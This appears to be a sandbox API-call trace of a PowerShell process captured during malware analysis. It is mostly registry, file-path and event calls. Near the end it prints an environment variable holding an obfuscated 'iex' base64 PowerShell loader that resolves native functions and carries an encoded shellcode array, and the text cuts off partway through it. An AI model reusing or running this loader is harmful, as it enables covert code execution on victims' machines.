lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13db2c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0090.487] GetLastError () returned 0xcb [0090.487] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13db2c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0090.487] GetLastError () returned 0xcb [0090.487] VirtualQuery (in: lpAddress=0x13d0a8, lpBuffer=0x13e0a8, dwLength=0x1c | out: lpBuffer=0x13e0a8*(BaseAddress=0x13d000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0090.488] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13db7c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0090.488] GetLastError () returned 0xcb [0090.488] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13db2c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0090.488] GetLastError () returned 0xcb [0090.488] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13db2c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0090.488] GetLastError () returned 0xcb [0090.488] VirtualQuery (in: lpAddress=0x13d0a0, lpBuffer=0x13e0a0, dwLength=0x1c | out: lpBuffer=0x13e0a0*(BaseAddress=0x13d000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0090.488] VirtualQuery (in: lpAddress=0x13cd54, lpBuffer=0x13dd54, dwLength=0x1c | out: lpBuffer=0x13dd54*(BaseAddress=0x13c000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0090.488] VirtualQuery (in: lpAddress=0x13cd54, lpBuffer=0x13dd54, dwLength=0x1c | out: lpBuffer=0x13dd54*(BaseAddress=0x13c000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0090.489] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x13e7dc | out: phkResult=0x13e7dc*=0x398) returned 0x0 [0090.489] RegQueryValueExW (in: hKey=0x398, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x13e824, lpData=0x0, lpcbData=0x13e820*=0x0 | out: lpType=0x13e824*=0x1, lpData=0x0, lpcbData=0x13e820*=0x56) returned 0x0 [0090.489] RegQueryValueExW (in: hKey=0x398, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x13e824, lpData=0x3953b0, lpcbData=0x13e820*=0x56 | out: lpType=0x13e824*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x13e820*=0x56) returned 0x0 [0090.489] RegCloseKey (hKey=0x398) returned 0x0 [0090.489] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x13e7dc | out: phkResult=0x13e7dc*=0x398) returned 0x0 [0090.490] RegQueryValueExW (in: hKey=0x398, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x13e824, lpData=0x0, lpcbData=0x13e820*=0x0 | out: lpType=0x13e824*=0x1, lpData=0x0, lpcbData=0x13e820*=0x56) returned 0x0 [0090.490] RegQueryValueExW (in: hKey=0x398, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x13e824, lpData=0x3953b0, lpcbData=0x13e820*=0x56 | out: lpType=0x13e824*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x13e820*=0x56) returned 0x0 [0090.490] RegCloseKey (hKey=0x398) returned 0x0 [0090.490] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x3953b0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0 [0090.490] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x13e374, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27 [0090.490] GetLastError () returned 0x3f0 [0090.490] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x3953b0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0 [0090.491] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x13e374, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27 [0090.491] GetLastError () returned 0x3f0 [0090.491] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\profile.ps1", nBufferLength=0x105, lpBuffer=0x13e40c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\profile.ps1", lpFilePart=0x0) returned 0x36 [0090.491] GetLastError () returned 0x3f0 [0090.491] SetErrorMode (uMode=0x1) returned 0x1 [0090.491] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\profile.ps1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x13e88c | out: lpFileInformation=0x13e88c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0090.491] GetLastError () returned 0x2 [0090.491] SetErrorMode (uMode=0x1) returned 0x1 [0090.491] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x13e40c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x4b [0090.492] GetLastError () returned 0x2 [0090.492] SetErrorMode (uMode=0x1) returned 0x1 [0090.492] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x13e88c | out: lpFileInformation=0x13e88c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0090.492] GetLastError () returned 0x2 [0090.492] SetErrorMode (uMode=0x1) returned 0x1 [0090.492] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", nBufferLength=0x105, lpBuffer=0x13e40c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", lpFilePart=0x0) returned 0x45 [0090.492] GetLastError () returned 0x2 [0090.492] SetErrorMode (uMode=0x1) returned 0x1 [0090.492] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x13e88c | out: lpFileInformation=0x13e88c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0090.492] GetLastError () returned 0x3 [0090.492] SetErrorMode (uMode=0x1) returned 0x1 [0090.492] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x13e40c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x5a [0090.492] GetLastError () returned 0x3 [0090.492] SetErrorMode (uMode=0x1) returned 0x1 [0090.492] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x13e88c | out: lpFileInformation=0x13e88c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0090.492] GetLastError () returned 0x3 [0090.492] SetErrorMode (uMode=0x1) returned 0x1 [0090.493] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3953b0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0090.493] GetLastError () returned 0xcb [0090.494] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3953b0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0090.494] GetLastError () returned 0xcb [0090.496] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x398 [0090.496] GetLastError () returned 0x0 [0090.496] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x39c [0090.496] GetLastError () returned 0x0 [0090.496] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3a0 [0090.496] GetLastError () returned 0x0 [0090.496] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3a4 [0090.496] GetLastError () returned 0x0 [0090.496] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3a8 [0090.496] GetLastError () returned 0x0 [0090.496] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x3c4 [0090.496] GetLastError () returned 0x0 [0090.496] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x390 [0090.496] GetLastError () returned 0x0 [0090.496] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3b0 [0090.496] GetLastError () returned 0x0 [0090.496] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3b4 [0090.496] GetLastError () returned 0x0 [0090.496] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x324 [0090.496] GetLastError () returned 0x0 [0090.496] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x328 [0090.496] GetLastError () returned 0x0 [0090.496] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x348 [0090.496] GetLastError () returned 0x0 [0090.497] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3 [0090.497] GetLastError () returned 0xcb [0090.497] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x13e8cc | out: lpMode=0x13e8cc) returned 1 [0090.497] GetLastError () returned 0xcb [0090.498] SetEvent (hEvent=0x3a4) returned 1 [0090.498] GetLastError () returned 0xcb [0090.498] SetEvent (hEvent=0x398) returned 1 [0090.498] GetLastError () returned 0xcb [0090.498] SetEvent (hEvent=0x39c) returned 1 [0090.498] GetLastError () returned 0xcb [0090.498] SetEvent (hEvent=0x3a0) returned 1 [0090.498] GetLastError () returned 0xcb [0090.498] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x358 [0090.498] GetLastError () returned 0x0 [0090.498] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0x13e730 | out: phkResult=0x13e730*=0x35c) returned 0x0 [0090.499] RegQueryValueExW (in: hKey=0x35c, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0x13e778, lpData=0x0, lpcbData=0x13e774*=0x0 | out: lpType=0x13e778*=0x0, lpData=0x0, lpcbData=0x13e774*=0x0) returned 0x2 Thread: id = 33 os_tid = 0x600 Thread: id = 34 os_tid = 0x63c Thread: id = 35 os_tid = 0x50c Thread: id = 36 os_tid = 0x278 Thread: id = 37 os_tid = 0x66c [0086.915] CoGetContextToken (in: pToken=0x4c5f3f8 | out: pToken=0x4c5f3f8) returned 0x0 [0086.915] CObjectContext::QueryInterface () returned 0x0 [0086.916] CObjectContext::GetCurrentThreadType () returned 0x0 [0086.916] Release () returned 0x0 [0086.916] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0089.538] LocalFree (hMem=0x39b508) returned 0x0 [0089.538] GetLastError () returned 0x0 [0089.538] CloseHandle (hObject=0x348) returned 1 [0089.538] GetLastError () returned 0x0 [0089.538] CloseHandle (hObject=0x13) returned 1 [0089.538] GetLastError () returned 0x0 [0089.538] CloseHandle (hObject=0xf) returned 1 [0089.539] GetLastError () returned 0x0 [0089.539] RegCloseKey (hKey=0x32c) returned 0x0 [0089.539] RegCloseKey (hKey=0x328) returned 0x0 [0089.539] RegCloseKey (hKey=0x324) returned 0x0 [0089.539] LocalFree (hMem=0x39b528) returned 0x0 [0089.539] GetLastError () returned 0x0 [0089.539] RegCloseKey (hKey=0x354) returned 0x0 [0090.166] RegCloseKey (hKey=0x38c) returned 0x0 [0090.166] RegCloseKey (hKey=0x388) returned 0x0 [0090.167] RegCloseKey (hKey=0x384) returned 0x0 [0090.167] RegCloseKey (hKey=0x380) returned 0x0 [0090.167] RegCloseKey (hKey=0x37c) returned 0x0 [0090.167] RegCloseKey (hKey=0x378) returned 0x0 [0090.167] RegCloseKey (hKey=0x374) returned 0x0 [0090.167] RegCloseKey (hKey=0x3bc) returned 0x0 [0090.167] RegCloseKey (hKey=0x3b8) returned 0x0 [0090.167] RegCloseKey (hKey=0x36c) returned 0x0 [0090.168] RegCloseKey (hKey=0x368) returned 0x0 [0090.168] RegCloseKey (hKey=0x364) returned 0x0 [0090.168] RegCloseKey (hKey=0x360) returned 0x0 [0090.168] RegCloseKey (hKey=0x35c) returned 0x0 [0090.168] RegCloseKey (hKey=0x358) returned 0x0 [0090.168] RegCloseKey (hKey=0x348) returned 0x0 [0090.169] RegCloseKey (hKey=0x328) returned 0x0 [0090.169] RegCloseKey (hKey=0x324) returned 0x0 [0090.169] RegCloseKey (hKey=0x3b4) returned 0x0 [0090.169] RegCloseKey (hKey=0x3b0) returned 0x0 [0090.169] RegCloseKey (hKey=0x390) returned 0x0 [0090.169] RegCloseKey (hKey=0x3c4) returned 0x0 [0090.169] RegCloseKey (hKey=0x3a8) returned 0x0 [0090.169] RegCloseKey (hKey=0x3a4) returned 0x0 [0090.170] RegCloseKey (hKey=0x3a0) returned 0x0 [0090.170] RegCloseKey (hKey=0x39c) returned 0x0 [0090.170] RegCloseKey (hKey=0x398) returned 0x0 [0090.170] RegCloseKey (hKey=0x394) returned 0x0 [0090.170] RegCloseKey (hKey=0x32c) returned 0x0 [0090.170] RegCloseKey (hKey=0x3c0) returned 0x0 [0090.170] RegCloseKey (hKey=0x354) returned 0x0 Thread: id = 38 os_tid = 0x174 [0090.501] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0090.517] SetThreadUILanguage (LangId=0x0) returned 0x409 [0090.520] VirtualQuery (in: lpAddress=0x60ae4f0, lpBuffer=0x60af4f0, dwLength=0x1c | out: lpBuffer=0x60af4f0*(BaseAddress=0x60ae000, AllocationBase=0x5720000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0090.523] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x39dfb8, nSize=0x80 | out: lpBuffer="") returned 0x0 [0090.523] GetLastError () returned 0xcb [0090.525] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x39dfb8, nSize=0x80 | out: lpBuffer="") returned 0x0 [0090.525] GetLastError () returned 0xcb [0090.526] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x39dfb8, nSize=0x80 | out: lpBuffer="") returned 0x0 [0090.526] GetLastError () returned 0xcb [0090.535] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x39dfb8, nSize=0x80 | out: lpBuffer="") returned 0x0 [0090.535] GetLastError () returned 0xcb [0090.539] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x39dfb8, nSize=0x80 | out: lpBuffer="") returned 0x0 [0090.539] GetLastError () returned 0xcb [0090.540] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x39dfb8, nSize=0x80 | out: lpBuffer="") returned 0x0 [0090.540] GetLastError () returned 0xcb [0090.546] VirtualQuery (in: lpAddress=0x60ae60c, lpBuffer=0x60af60c, dwLength=0x1c | out: lpBuffer=0x60af60c*(BaseAddress=0x60ae000, AllocationBase=0x5720000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0090.547] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x39dfb8, nSize=0x80 | out: lpBuffer="") returned 0x0 [0090.547] GetLastError () returned 0xcb [0090.548] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x39dfb8, nSize=0x80 | out: lpBuffer="") returned 0x0 [0090.548] GetLastError () returned 0xcb [0090.548] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x39dfb8, nSize=0x80 | out: lpBuffer="") returned 0x0 [0090.548] GetLastError () returned 0xcb [0090.554] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x39dfb8, nSize=0x80 | out: lpBuffer="") returned 0x0 [0090.554] GetLastError () returned 0xcb [0090.567] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x39dfb8, nSize=0x80 | out: lpBuffer="") returned 0x0 [0090.567] GetLastError () returned 0xcb [0090.593] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x39dfb8, nSize=0x80 | out: lpBuffer="") returned 0x0 [0090.593] GetLastError () returned 0xcb [0090.594] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x39dfb8, nSize=0x80 | out: lpBuffer="") returned 0x0 [0090.594] GetLastError () returned 0xcb [0090.594] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x39dfb8, nSize=0x80 | out: lpBuffer="") returned 0x0 [0090.594] GetLastError () returned 0xcb [0090.596] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x39dfb8, nSize=0x80 | out: lpBuffer="") returned 0x0 [0090.596] GetLastError () returned 0xcb [0090.596] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x39dfb8, nSize=0x80 | out: lpBuffer="") returned 0x0 [0090.596] GetLastError () returned 0xcb [0090.597] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x39dfb8, nSize=0x80 | out: lpBuffer="") returned 0x0 [0090.597] GetLastError () returned 0xcb [0090.598] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x39dfb8, nSize=0x80 | out: lpBuffer="") returned 0x0 [0090.598] GetLastError () returned 0xcb [0090.614] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x39dfb8, nSize=0x80 | out: lpBuffer="") returned 0x0 [0090.615] GetLastError () returned 0xcb [0090.628] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x39dfb8, nSize=0x80 | out: lpBuffer="") returned 0x0 [0090.628] GetLastError () returned 0xcb [0090.635] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x39dfb8, nSize=0x80 | out: lpBuffer="") returned 0x0 [0090.635] GetLastError () returned 0xcb [0090.637] GetEnvironmentVariableW (in: lpName="a", lpBuffer=0x39dfb8, nSize=0x80 | out: lpBuffer="") returned 0x7308 [0090.637] GetLastError () returned 0xcb [0090.637] GetEnvironmentVariableW (in: lpName="a", lpBuffer=0x50a0f58, nSize=0x7308 | out: lpBuffer="iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('ZnVuY3Rpb24gZ2R7UGFyYW0gKFtQYXJhbWV0ZXIoUG9zaXRpb249MCxNYW5kYXRvcnk9JFRydWUpXSBbVHlwZVtdXSAkUGFyYW1ldGVycyxbUGFyYW1ldGVyKFBvc2l0aW9uPTEpXSBbVHlwZV0gJFJldHVyblR5cGU9W1ZvaWRdKTskVHlwZUJ1aWxkZXI9W0FwcERvbWFpbl06OkN1cnJlbnREb21haW4uRGVmaW5lRHluYW1pY0Fzc2VtYmx5KChOZXctT2JqZWN0IFN5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5TmFtZSgiUmVmbGVjdGVkRGVsZWdhdGUiKSksW1N5c3RlbS5SZWZsZWN0aW9uLkVtaXQuQXNzZW1ibHlCdWlsZGVyQWNjZXNzXTo6UnVuKS5EZWZpbmVEeW5hbWljTW9kdWxlKCJJbk1lbW9yeU1vZHVsZSIsJGZhbHNlKS5EZWZpbmVUeXBlKCJNeURlbGVnYXRlVHlwZSIsIkNsYXNzLFB1YmxpYyxTZWFsZWQsQW5zaUNsYXNzLEF1dG9DbGFzcyIsW1N5c3RlbS5NdWx0aWNhc3REZWxlZ2F0ZV0pOyRUeXBlQnVpbGRlci5EZWZpbmVDb25zdHJ1Y3RvcigiUlRTcGVjaWFsTmFtZSxIaWRlQnlTaWcsUHVibGljIixbU3lzdGVtLlJlZmxlY3Rpb24uQ2FsbGluZ0NvbnZlbnRpb25zXTo6U3RhbmRhcmQsJFBhcmFtZXRlcnMpLlNldEltcGxlbWVudGF0aW9uRmxhZ3MoIlJ1bnRpbWUsTWFuYWdlZCIpOyRUeXBlQnVpbGRlci5EZWZpbmVNZXRob2QoIkludm9rZSIsIlB1YmxpYyxIaWRlQnlTaWcsTmV3U2xvdCxWaXJ0dWFsIiwkUmV0dXJuVHlwZSwkUGFyYW1ldGVycykuU2V0SW1wbGVtZW50YXRpb25GbGFncygiUnVudGltZSxNYW5hZ2VkIik7cmV0dXJuICRUeXBlQnVpbGRlci5DcmVhdGVUeXBlKCk7fWZ1bmN0aW9uIGdhe1BhcmFtIChbUGFyYW1ldGVyKFBvc2l0aW9uPTAsTWFuZGF0b3J5PSRUcnVlKV0gW1N0cmluZ10gJE1vZHVsZSxbUGFyYW1ldGVyKFBvc2l0aW9uPTEsTWFuZGF0b3J5PSRUcnVlKV0gW1N0cmluZ10gJFByb2NlZHVyZSk7JFN5c3RlbUFzc2VtYmx5PVtBcHBEb21haW5dOjpDdXJyZW50RG9tYWluLkdldEFzc2VtYmxpZXMoKXxXaGVyZS1PYmplY3QgeyAkXy5HbG9iYWxBc3NlbWJseUNhY2hlIC1BbmQgJF8uTG9jYXRpb24uU3BsaXQoIlxcIilbLTFdLkVxdWFscygiU3lzdGVtLmRsbCIpfTskVW5zYWZlTmF0aXZlTWV0aG9kcz0kU3lzdGVtQXNzZW1ibHkuR2V0VHlwZSgiTWljcm9zb2Z0LldpbjMyLlVuc2FmZU5hdGl2ZU1ldGhvZHMiKTtyZXR1cm4gJFVuc2FmZU5hdGl2ZU1ldGhvZHMuR2V0TWV0aG9kKCJHZXRQcm9jQWRkcmVzcyIpLkludm9rZSgkbnVsbCxAKFtTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXMuSGFuZGxlUmVmXShOZXctT2JqZWN0IFN5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlcy5IYW5kbGVSZWYoKE5ldy1PYmplY3QgSW50UHRyKSwkVW5zYWZlTmF0aXZlTWV0aG9kcy5HZXRNZXRob2QoIkdldE1vZHVsZUhhbmRsZSIpLkludm9rZSgkbnVsbCxAKCRNb2R1bGUpKSkpLCRQcm9jZWR1cmUpKTt9W0J5dGVbXV0gJHA9W0NvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCJWWXZzZyt4b2FtdFlhbVZtaVVXWVdHcHlab2xGbWxocWJtYUpSWnhZYW1WbWlVV2VXR3BzWm9sRm9GaHFNMmFKUmFKWWFqSm1pVVdrV0dvdVpvbEZwbGhxWkdhSlJhaFlhbXhtaVVXcVdHYUpSYXhtaVVXdVpLRXdBQUFBeDBYQVZtbHlkTWRGeEhWaGJFSEhSY2hzYkc5anhrWE1BSXRBREZPRHdBeFd4MFhRVEc5aFpNZEYxRXhwWW5MSFJkaGhjbmxCeGtYY0FNZEZzRWRsZEZESFJiUnliMk5CeDBXNFpHUnlaV2JIUmJ4emM4WkZ2Z0NMeUZlTENXYURlU3dZZFNXTGNUQ05WWmd6L3l2eWpSUitpbFFWbURKVWZaajJ3a0YxQmtlRC93eHk2b1AvREhRNU84aDF6b3RWQ0l0Q1BJdEVFSGlEWmZnQUE4S0xlQ0NMY0J5TFdDU0xRQmdEOGdQYUEvcUpkZWlKWGV5SlJlU0Z3QStFZ2dBQUFPc0xpMUVZNjhtTFhleUxkZWlMUmZpTERJY1B0d1JEaXpTR2cyWDhBQVBLaVUzMGpVWFFBL0lwUmZTTFJmeUxYZlFEMklwRUJkQTZSQjNRZFFuL1JmeURmZndOY3VXRGZmd05kUU9KZGVDSlRmU05UYkF6d0NsTjlJdE45SXBjQmJBRHlEcGNEYkIxQmtDRCtBOXk2NFA0RDNVRGlYWHcvMFg0aTBYNE8wWGtjb1dOUmNCUVV2OVY4SXQxQ0l1ZVFCRUFBSUhHQkJFQUFHcEFhQUF3QUFBRDN2OXpVR29BLzlDSlJmaUZ3QStFRmdFQUFJdExWSU5sOUFDTCtQT2tEN2RMRkkxVUdTQXp5V1k3U3daek00dEtDSXN5Tzg1MkFvdk9oY2wwRll0OUNJdHlESUhIQkJFQUFBUDNpM29FQS9qenBBKzNTd2IvUmZTRHdpZzVUZlJ5ell0d1BBUHdpNDZBQUFBQWczd0JEQUIwU1kxOEFReUxEd1BJVWY5VjRJbEY1SVhBZEN1TFh3UURYZmpySG9zRGhjQjVCUSszd09zSGkwMzRqVVFJQWxEL2RlVC9WZkNKQTRQREJJTTdBSFhkaTBYNGc4Y1VnejhBZGJ1TGpxUUFBQUNKVGVDTGpxQUFBQUNMMkN0ZU5BUElnMlgwQU9zMmkxWGdPVlgwY3pXTlZ2alI2blFpalhrSWlWWHdEN2NYWm9YU2RBeUI0djhQQUFBRDBBTVJBUnFEeHdML1RmQjE1QUYxOUFQT2kzRUVoZloxdzR0SVBJdE1DQ2hxQUdvQi8zVUlBOGovMGVzQ004QmZYbHZKd2hBQVUxVldNL1pYT1RVNGtFQUFkUXYvRldnd1FBQ2pPSkJBQUlzZERERkFBTDA0a0VBQVZmL1RhZzR6